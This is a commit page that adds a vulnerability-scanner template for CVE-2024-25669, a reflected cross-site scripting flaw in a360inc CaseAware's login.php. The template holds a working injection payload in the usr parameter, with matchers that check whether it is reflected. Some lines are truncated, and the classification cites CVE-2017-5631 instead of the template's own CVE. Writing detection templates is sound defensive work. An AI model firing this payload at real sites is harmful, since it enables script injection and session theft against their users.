Adding CVE-2024-25669

patch-1
Chapman Schleiss 2024-02-13 15:42:24 -07:00
parent e55db3901e
commit 830d21b3c6
1 changed files with 47 additions and 0 deletions

View File

@ -0,0 +1,47 @@
id: CVE-2024-25669
info:
name: a360inc CaseAware - Cross-Site Scripting
author: r3naissance
severity: medium
description: a360inc CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string. This is a bypass of the fix reported in CVE-2017->
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of t>
remediation: |
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-25669
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
epss-score: 0.00286
epss-percentile: 0.65504
cpe: cpe:2.3:a:a360inc:caseaware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: a360inc
product: caseaware
tags: cve2024,cve,xss,caseaware,a360inc
http:
- method: GET
path:
- "{{BaseURL}}/login.php?mid=0&usr=%27onpointerover%3Dconfirm%28xss%29+class%3Dr3naissance+"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'onpointerover=confirm(xss)+class=r3naissance+"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200